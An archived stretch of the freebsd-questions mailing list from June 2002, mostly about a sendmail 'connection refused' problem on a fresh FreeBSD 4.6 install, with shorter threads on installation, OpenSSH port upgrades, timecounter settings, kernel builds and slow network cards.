phone/fax: +380 612 64-19-72 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 23: 3:13 2002 Delivered-To: freebsd-questions@freebsd.org Received: from web14405.mail.yahoo.com (web14405.mail.yahoo.com [216.136.174.62]) by hub.freebsd.org (Postfix) with SMTP id 1215837B493 for ; Tue, 25 Jun 2002 23:02:36 -0700 (PDT) Message-ID: <20020626060235.88002.qmail@web14405.mail.yahoo.com> Received: from [210.53.48.65] by web14405.mail.yahoo.com via HTTP; Tue, 25 Jun 2002 23:02:35 PDT Date: Tue, 25 Jun 2002 23:02:35 -0700 (PDT) From: Qingjia Zhu Subject: sendmail refuse localhost? To: freebsd-questions@freebsd.org MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hello, I'm running a freshly installed FreeBSD 4.6 release, and I have problem sending mail. My FreeBSD box isn't connected to the internet. My HOSTNAME is set to qjzhu.headsun.net and /etc/hosts contains 127.0.0.1 localhost localhost.headsun.net I do can send mail step by step, for example [root@qjzhu root]# telnet localhost smtp Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. 220 qjzhu.headsun.net ESMTP Sendmail 8.12.3/8.12.3; Wed, 26 Jun 2002 13:29:28 +0 800 (CST) helo localhost 250 qjzhu.headsun.net Hello localhost [127.0.0.1], pleased to meet you mail from: root@localhost 250 2.1.0 root@localhost... Sender ok rcpt to: qjzhu 250 2.1.5 qjzhu... Recipient ok data 354 Enter mail, end with "." on a line by itself a test mail . 250 2.0.0 g5Q5TSxM000184 Message accepted for delivery quit 221 2.0.0 qjzhu.headsun.net closing connection Connection closed by foreign host. and /var/log/maillog logs Jun 26 13:30:11 qjzhu sm-mta[184]: g5Q5TSxM000184: from=root@localhost, size=12, class=0, nrcpts=1, msgid=<200206260529.g5Q5TSxM000184@qjzhu.h eadsun.net>, proto=SMTP, daemon=MTA, relay=localhost [127.0.0.1] Jun 26 13:30:11 qjzhu sm-mta[188]: g5Q5TSxM000184: to=qjzhu, ctladdr=root@ localhost (0/0), delay=00:00:15, xdelay=00:00:00, mailer=local, pri=30444, relay=local, dsn=2.0.0, stat=Sent It's fine, but I can't send mail through 'mail' MUA, for example [root@qjzhu root]# mail qjzhu Subject: test a test mail . EOT [root@qjzhu root]# and /var/log/maillog logs Jun 26 13:38:04 qjzhu sendmail[140]: g5Q5c4pI000140: from=root, size=37, class=0, nrcpts=1, msgid=<200206260538.g5Q5c4pI000140@qjzhu.headsun.net>, relay=root@localhost Jun 26 13:38:04 qjzhu sendmail[140]: g5Q5c4pI000140: to=qjzhu, ctladdr=root (0/0), delay=00:00:00, xdelay=00:00:00, mailer=relay, pri=30025, relay=loca lhost.heasun.net., dsn=4.0.0, stat=Deferred: Connection refused by localhost. headsun.net . Why connection refused? I'm really unfamiliar with sendmail. Thank you very much. __________________________________________________ Do You Yahoo!? Everything you'll ever need on one web page from News and Sport to Email and Music Charts http://uk.my.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 23: 6:41 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.gbronline.com (mail.gbronline.com [12.145.226.4]) by hub.freebsd.org (Postfix) with ESMTP id A5B1B37B41C for ; Tue, 25 Jun 2002 23:06:03 -0700 (PDT) Received: from daleco [12.145.236.48] by mail.gbronline.com (SMTPD32-7.10) id A9712AA50094; Wed, 26 Jun 2002 01:04:33 -0500 Message-ID: <03c301c21cd7$7dba4160$30ec910c@fbccarthage.com> From: "Kevin Kinsey, DaleCo, S.P." To: "Prasad Iyer" , References: <000c01c21c53$0e0447a0$1902a8c0@sutlej> Subject: Re: about freebsd current version Date: Wed, 26 Jun 2002 01:05:35 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ----- Original Message ----- From: Prasad Iyer To: freebsd-questions@FreeBSD.ORG Sent: Tuesday, June 25, 2002 9:17 AM Subject: about freebsd current version >Sir, >I have recently downloaded freebsd Current Version. I am new to >Freebsd. I am installing Freebsd from DOS media. During the >installation it is not able to find bin directory I search your FTP >site for this directory but wasn't able to find it. Can you please >help me with this. >Your early reply would be highly appreciated. As a programmer I am >very restless. >Thanks >regards >Prasad Iyer >(india) Prasad --- FreeBSD is a user run community, so "Sir" may be overkill... There are lots of people worldwide who run FBSD on their own machines; some of them read this email list and help others. Hopefully someone will feel like answering your question. Usually a question like this gets several questions in return. However, maybe this will help..... ftp ftp.freebsd.org cd pub cd FreeBSD cd releases cd i386 cd 4.6-RELEASE cd bin <-------you're there..... It's a lot of files..... Good luck, Kevin Kinsey, DaleCo, S.P. Missouri, USA To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 23:12:29 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.gbronline.com (mail.gbronline.com [12.145.226.4]) by hub.freebsd.org (Postfix) with ESMTP id 038C737B4B3 for ; Tue, 25 Jun 2002 23:08:10 -0700 (PDT) Received: from daleco [12.145.236.48] by mail.gbronline.com (SMTPD32-7.10) id A9F12ABA0094; Wed, 26 Jun 2002 01:06:41 -0500 Message-ID: <03cf01c21cd7$c95a9b60$30ec910c@fbccarthage.com> From: "Kevin Kinsey, DaleCo, S.P." To: "Qingjia Zhu" , References: <20020626060235.88002.qmail@web14405.mail.yahoo.com> Subject: Re: sendmail refuse localhost? Date: Wed, 26 Jun 2002 01:07:43 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG What's in /etc/mail/relay-domains? KDK ----- Original Message ----- From: "Qingjia Zhu" To: Sent: Wednesday, June 26, 2002 1:02 AM Subject: sendmail refuse localhost? > Hello, > > I'm running a freshly installed FreeBSD 4.6 release, and I have problem > sending mail. My FreeBSD box isn't connected to the internet. > My HOSTNAME is set to qjzhu.headsun.net and /etc/hosts contains > 127.0.0.1 localhost localhost.headsun.net > > I do can send mail step by step, for example > [root@qjzhu root]# telnet localhost smtp > Trying 127.0.0.1... > Connected to localhost. > Escape character is '^]'. > 220 qjzhu.headsun.net ESMTP Sendmail 8.12.3/8.12.3; Wed, 26 Jun 2002 > 13:29:28 +0 800 (CST) > helo localhost > 250 qjzhu.headsun.net Hello localhost [127.0.0.1], pleased to meet you > mail from: root@localhost > 250 2.1.0 root@localhost... Sender ok > rcpt to: qjzhu > 250 2.1.5 qjzhu... Recipient ok > data > 354 Enter mail, end with "." on a line by itself > a test mail > . > 250 2.0.0 g5Q5TSxM000184 Message accepted for delivery > quit > 221 2.0.0 qjzhu.headsun.net closing connection > Connection closed by foreign host. > > and /var/log/maillog logs > Jun 26 13:30:11 qjzhu sm-mta[184]: g5Q5TSxM000184: from=root@localhost, > size=12, class=0, nrcpts=1, msgid=<200206260529.g5Q5TSxM000184@qjzhu.h > eadsun.net>, proto=SMTP, daemon=MTA, relay=localhost [127.0.0.1] > Jun 26 13:30:11 qjzhu sm-mta[188]: g5Q5TSxM000184: to=qjzhu, ctladdr=root@ > localhost (0/0), delay=00:00:15, xdelay=00:00:00, mailer=local, pri=30444, > relay=local, dsn=2.0.0, stat=Sent > > It's fine, but I can't send mail through 'mail' MUA, for example > [root@qjzhu root]# mail qjzhu > Subject: test > a test mail > . > EOT > [root@qjzhu root]# > and /var/log/maillog logs > Jun 26 13:38:04 qjzhu sendmail[140]: g5Q5c4pI000140: from=root, size=37, > class=0, nrcpts=1, msgid=<200206260538.g5Q5c4pI000140@qjzhu.headsun.net>, > relay=root@localhost > Jun 26 13:38:04 qjzhu sendmail[140]: g5Q5c4pI000140: to=qjzhu, ctladdr=root > (0/0), delay=00:00:00, xdelay=00:00:00, mailer=relay, pri=30025, relay=loca > lhost.heasun.net., dsn=4.0.0, stat=Deferred: Connection refused by localhost. > headsun.net > . > > Why connection refused? I'm really unfamiliar with sendmail. > Thank you very much. > > __________________________________________________ > Do You Yahoo!? > Everything you'll ever need on one web page > from News and Sport to Email and Music Charts > http://uk.my.yahoo.com > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 23:22:13 2002 Delivered-To: freebsd-questions@freebsd.org Received: from matrix.zssm.zp.ua (matrix.zssm.zp.ua [212.8.32.10]) by hub.freebsd.org (Postfix) with ESMTP id D684037B429 for ; Tue, 25 Jun 2002 23:21:27 -0700 (PDT) Received: from server.hermes-comp.zp.ua (germes-comp.zssm.zp.ua [212.8.32.132] (may be forged)) by matrix.zssm.zp.ua (8.11.3/8.11.3) with ESMTP id g5Q6FBo81715; Wed, 26 Jun 2002 09:15:18 +0300 (EEST) (envelope-from stalker@hermes-comp.zp.ua) Received: from localhost (localhost [127.0.0.1]) by server.hermes-comp.zp.ua (Postfix) with ESMTP id 7F28538302; Wed, 26 Jun 2002 09:22:28 +0300 (EEST) Date: Wed, 26 Jun 2002 09:22:28 +0300 (EEST) From: Alexander V Zubchenko To: Qingjia Zhu Cc: Subject: Re: sendmail refuse localhost? In-Reply-To: <20020626060235.88002.qmail@web14405.mail.yahoo.com> Message-ID: <20020626091818.K10703-100000@server.hermes-comp.zp.ua> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Greetings! On Tue, 25 Jun 2002, Qingjia Zhu wrote: > Hello, > > I'm running a freshly installed FreeBSD 4.6 release, and I have problem > sending mail. My FreeBSD box isn't connected to the internet. > My HOSTNAME is set to qjzhu.headsun.net and /etc/hosts contains > 127.0.0.1 localhost localhost.headsun.net > > I do can send mail step by step, for example > [root@qjzhu root]# telnet localhost smtp > Trying 127.0.0.1... > Connected to localhost. > Escape character is '^]'. > 220 qjzhu.headsun.net ESMTP Sendmail 8.12.3/8.12.3; Wed, 26 Jun 2002 > 13:29:28 +0 800 (CST) > helo localhost > 250 qjzhu.headsun.net Hello localhost [127.0.0.1], pleased to meet you > mail from: root@localhost > 250 2.1.0 root@localhost... Sender ok > rcpt to: qjzhu > 250 2.1.5 qjzhu... Recipient ok > data > 354 Enter mail, end with "." on a line by itself > a test mail > . > 250 2.0.0 g5Q5TSxM000184 Message accepted for delivery > quit > 221 2.0.0 qjzhu.headsun.net closing connection > Connection closed by foreign host. > > and /var/log/maillog logs > Jun 26 13:30:11 qjzhu sm-mta[184]: g5Q5TSxM000184: from=root@localhost, > size=12, class=0, nrcpts=1, msgid=<200206260529.g5Q5TSxM000184@qjzhu.h > eadsun.net>, proto=SMTP, daemon=MTA, relay=localhost [127.0.0.1] > Jun 26 13:30:11 qjzhu sm-mta[188]: g5Q5TSxM000184: to=qjzhu, ctladdr=root@ > localhost (0/0), delay=00:00:15, xdelay=00:00:00, mailer=local, pri=30444, > relay=local, dsn=2.0.0, stat=Sent > > It's fine, but I can't send mail through 'mail' MUA, for example > [root@qjzhu root]# mail qjzhu > Subject: test > a test mail > . > EOT > [root@qjzhu root]# > and /var/log/maillog logs > Jun 26 13:38:04 qjzhu sendmail[140]: g5Q5c4pI000140: from=root, size=37, > class=0, nrcpts=1, msgid=<200206260538.g5Q5c4pI000140@qjzhu.headsun.net>, > relay=root@localhost > Jun 26 13:38:04 qjzhu sendmail[140]: g5Q5c4pI000140: to=qjzhu, ctladdr=root > (0/0), delay=00:00:00, xdelay=00:00:00, mailer=relay, pri=30025, relay=loca > lhost.heasun.net., dsn=4.0.0, stat=Deferred: Connection refused by localhost. > headsun.net > . > > Why connection refused? I'm really unfamiliar with sendmail. > Thank you very much. > > __________________________________________________ > Do You Yahoo!? > Everything you'll ever need on one web page > from News and Sport to Email and Music Charts > http://uk.my.yahoo.com > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > Check Your /etc/mail/sendmail.cf for: Cw #This is your main name under which mail is going Cw #Obvious Fw-o/etc/mail/local-host-names #Exact filename may b other. Last line set path to file, consisting of names of Your mailserver, known to sendmail. One name per line. i hope this help and if You have some more questions or something is not clear, mail me... With best wishes, Alexander V Zubchenko, E-Mail: stalker@hermes-comp.zp.ua System Administrator, WWW: http://www.hermes-comp.zp.ua/ Hermes-comp, Ukraine, Zaporizhzhya, Geroev Stalingrada 50 phone/fax: +380 612 64-19-72 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 23:41:37 2002 Delivered-To: freebsd-questions@freebsd.org Received: from smtp.infracaninophile.co.uk (happy-idiot-talk.infracaninophile.co.uk [81.2.69.218]) by hub.freebsd.org (Postfix) with ESMTP id 5A20D37B400 for ; Tue, 25 Jun 2002 23:41:33 -0700 (PDT) Received: from happy-idiot-talk.infracaninophile.co.uk (localhost.infracaninophile.co.uk [IPv6:::1]) by smtp.infracaninophile.co.uk (8.12.4/8.12.4) with ESMTP id g5Q6fV4W053494; Wed, 26 Jun 2002 07:41:31 +0100 (BST) (envelope-from matthew@happy-idiot-talk.infracaninophile.co.uk) Received: (from matthew@localhost) by happy-idiot-talk.infracaninophile.co.uk (8.12.4/8.12.4/Submit) id g5Q6fOjh053493; Wed, 26 Jun 2002 07:41:24 +0100 (BST) Date: Wed, 26 Jun 2002 07:41:24 +0100 From: Matthew Seaman To: Scott Mitchell Cc: Matthew Seaman , Christopher Schulte , Lord Raiden , Marco Radzinschi , FreeBDS-Questions Subject: Re: Upcoming OpenSSH vulnerability (fwd) Message-ID: <20020626064124.GA53337@happy-idiot-talk.infracaninophi> References: <5.1.1.6.2.20020624224948.02923518@pop3s.schulte.org> <20020624234646.G22328-100000@mail.radzinschi.com> <4.2.0.58.20020625134233.009992b0@pop.netzero.net> <5.1.1.6.2.20020625124040.041c50f0@pop3s.schulte.org> <20020625205840.B381@fishballoon.dyndns.org> <20020625205928.GA50230@happy-idiot-talk.infracaninophi> <20020625232606.C381@fishballoon.dyndns.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020625232606.C381@fishballoon.dyndns.org> User-Agent: Mutt/1.5.1i Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Tue, Jun 25, 2002 at 11:26:06PM +0100, Scott Mitchell wrote: > I see the openssh-portable port Makefile has a OPENSSH_OVERWRITE_BASE > option. Presumably I can set that and NO_OPENSSH in make.conf to have the > port replace the base ssh temporarily -- fewer things to undo when 3.4p1 > hits the base system. Any non-obvious disadvantages to that approach that > I'm not seeing? That sounds quite reasonable, but I don't really know of any gotchas as I just installed the port under /usr/local and left the rest of the system as it was. Your choice. Matthew -- Dr Matthew J Seaman MA, D.Phil. 26 The Paddocks Savill Way Tel: +44 1628 476614 Marlow Fax: +44 0870 0522645 Bucks., SL7 1TH UK To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 23:43:57 2002 Delivered-To: freebsd-questions@freebsd.org Received: from imo-d01.mx.aol.com (imo-d01.mx.aol.com [205.188.157.33]) by hub.freebsd.org (Postfix) with ESMTP id C410E37B406 for ; Tue, 25 Jun 2002 23:43:48 -0700 (PDT) Received: from Lenderman22@aol.com by imo-d01.mx.aol.com (mail_out_v32.21.) id n.f8.1d74ae87 (657) for ; Wed, 26 Jun 2002 02:43:36 -0400 (EDT) From: Lenderman22@aol.com Message-ID: Date: Wed, 26 Jun 2002 02:43:35 EDT Subject: help! To: questions@FreeBSD.org MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="part1_f8.1d74ae87.2a4abc97_boundary" X-Mailer: AOL 6.0 for Windows US sub 10568 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG --part1_f8.1d74ae87.2a4abc97_boundary Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit Hello, I am trying to install FreeBSD over the internet onto a pc and need some basic information of how to discover my own IP address, my ISPs IP address and their DNS . I understand I will need this before beginning my installation. As well, I do also need to know the "At commands" spoken of so that I may dial into the mirror site to begin this whole process. Hope you can help. Many thanks. Mark --part1_f8.1d74ae87.2a4abc97_boundary Content-Type: text/html; charset="US-ASCII" Content-Transfer-Encoding: 7bit Hello,

I am trying to install FreeBSD over the internet onto a pc and need some basic information of how to discover my own IP address, my ISPs IP address and their DNS . I understand I will need this before beginning my installation. As well, I do also need to know the "At commands" spoken of so that I may dial into the mirror site to begin this whole process. Hope you can help.

Many thanks.
Mark
--part1_f8.1d74ae87.2a4abc97_boundary-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 0: 0: 0 2002 Delivered-To: freebsd-questions@freebsd.org Received: from tierzero.apana.org.au (sa.apana.org.au [203.14.158.1]) by hub.freebsd.org (Postfix) with ESMTP id 46CB937B40F for ; Tue, 25 Jun 2002 23:59:41 -0700 (PDT) Received: from there (dialup-13.pasa.apana.org.au [203.14.158.142]) by tierzero.apana.org.au (8.11.1/8.11.1) with SMTP id g5Q6xXf87673; Wed, 26 Jun 2002 16:29:34 +0930 (CST) (envelope-from bastill@sa.apana.org.au) Message-Id: <200206260659.g5Q6xXf87673@tierzero.apana.org.au> Content-Type: text/plain; charset="iso-8859-1" From: Brian Astill Reply-To: bastill@sa.apana.org.au To: "Greg 'groggy' Lehey" Subject: microuptime Date: Wed, 26 Jun 2002 16:34:22 +0930 X-Mailer: KMail [version 1.3] References: <200203220239.g2M2drw76856@tierzero.apana.org.au> <20020322131903.M463@wantadilla.lemis.com> In-Reply-To: <20020322131903.M463@wantadilla.lemis.com> Cc: questions@FreeBSD.org MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG The "microuptime going backwards" problem seems to be fixed by: > fire% sysctl kern.timecounter > kern.timecounter.method: 0 > kern.timecounter.hardware: i8254 (that's what I get, too) >I set it to the following and it stopped : > %sysctl kern.timecounter > kern.timecounter.method: 1 > kern.timecounter.hardware: TSC However, I cannot find out how to set those desirable parameters. How is this done, please? -- Regards, Brian To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 0:51:58 2002 Delivered-To: freebsd-questions@freebsd.org Received: from web14403.mail.yahoo.com (web14403.mail.yahoo.com [216.136.174.60]) by hub.freebsd.org (Postfix) with SMTP id 1C80B37B401 for ; Wed, 26 Jun 2002 00:51:51 -0700 (PDT) Message-ID: <20020626075150.71108.qmail@web14403.mail.yahoo.com> Received: from [210.53.51.152] by web14403.mail.yahoo.com via HTTP; Wed, 26 Jun 2002 00:51:50 PDT Date: Wed, 26 Jun 2002 00:51:50 -0700 (PDT) From: Qingjia Zhu Subject: Re: sendmail refuse localhost? To: "Kevin Kinsey, DaleCo, S.P." Cc: freebsd-questions@freebsd.org In-Reply-To: <03cf01c21cd7$c95a9b60$30ec910c@fbccarthage.com> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hi, Kevin, It's freshly installed, I ain't got this file. I tried to create it and put localhost localhost.headsun.net in it, but problem still exists. What am I doing wrong? >What's in /etc/mail/relay-domains? > > KDK > > ----- Original Message ----- > From: "Qingjia Zhu" > To: > Sent: Wednesday, June 26, 2002 1:02 AM > Subject: sendmail refuse localhost? > > > > Hello, > > > > I'm running a freshly installed FreeBSD 4.6 release, and I have problem > > sending mail. My FreeBSD box isn't connected to the internet. > > My HOSTNAME is set to qjzhu.headsun.net and /etc/hosts contains > > 127.0.0.1 localhost localhost.headsun.net > > > > I do can send mail step by step, for example > > [root@qjzhu root]# telnet localhost smtp > > Trying 127.0.0.1... > > Connected to localhost. > > Escape character is '^]'. > > 220 qjzhu.headsun.net ESMTP Sendmail 8.12.3/8.12.3; Wed, 26 Jun 2002 > > 13:29:28 +0 800 (CST) > > helo localhost > > 250 qjzhu.headsun.net Hello localhost [127.0.0.1], pleased to meet you > > mail from: root@localhost > > 250 2.1.0 root@localhost... Sender ok > > rcpt to: qjzhu > > 250 2.1.5 qjzhu... Recipient ok > > data > > 354 Enter mail, end with "." on a line by itself > > a test mail > > . > > 250 2.0.0 g5Q5TSxM000184 Message accepted for delivery > > quit > > 221 2.0.0 qjzhu.headsun.net closing connection > > Connection closed by foreign host. > > > > and /var/log/maillog logs > > Jun 26 13:30:11 qjzhu sm-mta[184]: g5Q5TSxM000184: from=root@localhost, > > size=12, class=0, nrcpts=1, msgid=<200206260529.g5Q5TSxM000184@qjzhu.h > > eadsun.net>, proto=SMTP, daemon=MTA, relay=localhost [127.0.0.1] > > Jun 26 13:30:11 qjzhu sm-mta[188]: g5Q5TSxM000184: to=qjzhu, ctladdr=root@ > > localhost (0/0), delay=00:00:15, xdelay=00:00:00, mailer=local, pri=30444, > > relay=local, dsn=2.0.0, stat=Sent > > > > It's fine, but I can't send mail through 'mail' MUA, for example > > [root@qjzhu root]# mail qjzhu > > Subject: test > > a test mail > > . > > EOT > > [root@qjzhu root]# > > and /var/log/maillog logs > > Jun 26 13:38:04 qjzhu sendmail[140]: g5Q5c4pI000140: from=root, size=37, > > class=0, nrcpts=1, msgid=<200206260538.g5Q5c4pI000140@qjzhu.headsun.net>, > > relay=root@localhost > > Jun 26 13:38:04 qjzhu sendmail[140]: g5Q5c4pI000140: to=qjzhu, > ctladdr=root > > (0/0), delay=00:00:00, xdelay=00:00:00, mailer=relay, pri=30025, > relay=loca > > lhost.heasun.net., dsn=4.0.0, stat=Deferred: Connection refused by > localhost. > > headsun.net > > . > > > > Why connection refused? I'm really unfamiliar with sendmail. > > Thank you very much. __________________________________________________ Do You Yahoo!? Everything you'll ever need on one web page from News and Sport to Email and Music Charts http://uk.my.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 0:56:27 2002 Delivered-To: freebsd-questions@freebsd.org Received: from lennier.tninet.se (lennier.tninet.se [195.100.94.105]) by hub.freebsd.org (Postfix) with ESMTP id 9B8D437B405 for ; Wed, 26 Jun 2002 00:56:20 -0700 (PDT) Received: from pcmarpxy.tninet.se (bb-62-5-36-29.bb.tninet.se [62.5.36.29]) by lennier.tninet.se (BMR ErlangTM/OTP 3.0) with ESMTP id 438743.76351.1025.0s42500502lennier ; Wed, 26 Jun 2002 09:25:51 +0200 Content-Type: text/plain; charset="iso-8859-1" From: Mark Rowlands To: lketter , freebsd-questions@FreeBSD.ORG Subject: Re: make fail... Date: Wed, 26 Jun 2002 09:25:51 +0200 User-Agent: KMail/1.4.1 References: <3D1932EE.30601@config.com> In-Reply-To: <3D1932EE.30601@config.com> MIME-Version: 1.0 Content-Transfer-Encoding: quoted-printable Message-Id: <200206260925.51153.mark.rowlands@minmail.net> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Wednesday 26 June 2002 5:20 am, lketter wrote: > To Whom it may concern; > I have a system that is having a make fail after an upgrade from > FBSD 4.5 to FBSD 4.6. > Attached are files showing my system info, my 'MYKERNEL, and the > results of make.... > If there are any suggestions to repair this, please email me.... > Thanks, > Lester > > PS These are basically the same paramaters of my 4.5 kernel, just with > the new GENERIC copied.... The old one fails now with the same errors.= =2E. er at the risk of getting my head bitten off....... did you do a "make=20 buildworld" first? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 0:57:57 2002 Delivered-To: freebsd-questions@freebsd.org Received: from web14408.mail.yahoo.com (web14408.mail.yahoo.com [216.136.174.78]) by hub.freebsd.org (Postfix) with SMTP id 4553637B401 for ; Wed, 26 Jun 2002 00:57:48 -0700 (PDT) Message-ID: <20020626075748.22097.qmail@web14408.mail.yahoo.com> Received: from [210.53.51.152] by web14408.mail.yahoo.com via HTTP; Wed, 26 Jun 2002 00:57:48 PDT Date: Wed, 26 Jun 2002 00:57:48 -0700 (PDT) From: Qingjia Zhu Subject: Re: sendmail refuse localhost? To: Alexander V Zubchenko Cc: freebsd-questions@freebsd.org In-Reply-To: <20020626091818.K10703-100000@server.hermes-comp.zp.ua> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hi, Alexander /etc/mail/sendmail.cf is by default: Cwlocalhost Fw-o/etc/mail/local-host-names I create /etc/mail/local-host-names and add localhost localhost.headsun.net but with no luck, connection still refused. And some other people told me he's been having the exact same problem. Any further suggestion? thanks > Check Your /etc/mail/sendmail.cf for: > > Cw #This is your main name under which mail is going > Cw #Obvious > Fw-o/etc/mail/local-host-names #Exact filename may b other. > > Last line set path to file, consisting of names of Your mailserver, > known to sendmail. One name per line. i hope this help and if You have > some more questions or something is not clear, mail me... > > With best wishes, > __________________________________________________ Do You Yahoo!? Everything you'll ever need on one web page from News and Sport to Email and Music Charts http://uk.my.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 1: 6:14 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.cics.co.za (mail.cics.co.za [196.15.196.10]) by hub.freebsd.org (Postfix) with ESMTP id 0E45137B400 for ; Wed, 26 Jun 2002 01:06:01 -0700 (PDT) Received: (qmail 14179 invoked by uid 85); 26 Jun 2002 08:09:22 -0000 Received: from unknown (HELO mark.igate.org.za) (196.15.196.5) by mail.cics.co.za with SMTP; 26 Jun 2002 08:09:20 -0000 Date: Wed, 26 Jun 2002 10:05:38 +0200 From: Mark Pearce To: Fernando Gleiser Cc: mindugas77@delfi.lt, questions@FreeBSD.ORG Subject: Re: question about FTP Message-Id: <20020626100538.533b5dbf.mark@netchat.co.za> In-Reply-To: <20020625205733.K403-100000@localhost> References: <458423822.20020626014640@delfi.lt> <20020625205733.K403-100000@localhost> Organization: Netchat X-Mailer: Sylpheed version 0.7.6claws (GTK+ 1.2.10; i386-portbld-freebsd4.6) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-Virus-Scanned: by AMaViS perl-11 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Tue, 25 Jun 2002 21:00:11 -0300 (ART) Fernando Gleiser grunted: > On Wed, 26 Jun 2002, Mindaugas wrote: > > > Hello, > > > > My computer is connected: WinBOX<--->10MB hub<-->FreeBSDBox > > But the speed when I uploading to anon ftp is 60 - 90 kbps and when > > I downloading from my ftp speed is 1 - 15 kbps and it seems > > sometimes it hangs up. > > I may be your network interface configuration. Plese post the output of > a 'ifconfig -a'. Some cards are known to have problems with autoselect > media. Try seting that options manually > > > Fer > > > network cards are RTL8139 chips both (and winbox and BSDbox) > > At first I thought that my BSD box computer ($%&!(####@!!, but I > > installed Linux Slackware 8.0 and tryed ftp on it. > > i.e. LinuxBox<-->10MB hub<-->Winbox. > > The speed was 700 - 900 kbps (I think that is normal 10MB metwork speed) > > I tryed ftpd daemon, proftpd standalone,(on BSD) but speed is the > > same: 60 - 90 kbps. > > What I'm doing wrong??? > > may by my KERNEL need some options??? > > no firewall, no limitations is installed... the fresh install... > I have had the same problems before, with any FreeBSD version using the 8139 chipset working slowly. The only alternatives that I found was to upgrade the HUB to 100 or replace the network card. Sorry, no gems of wisdom here cos I've asked the list before, gotten all the usual answers about configuring the card, etc, but some cards just don't work well on a 10 network with FreeBSD. Mark To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 1: 8:38 2002 Delivered-To: 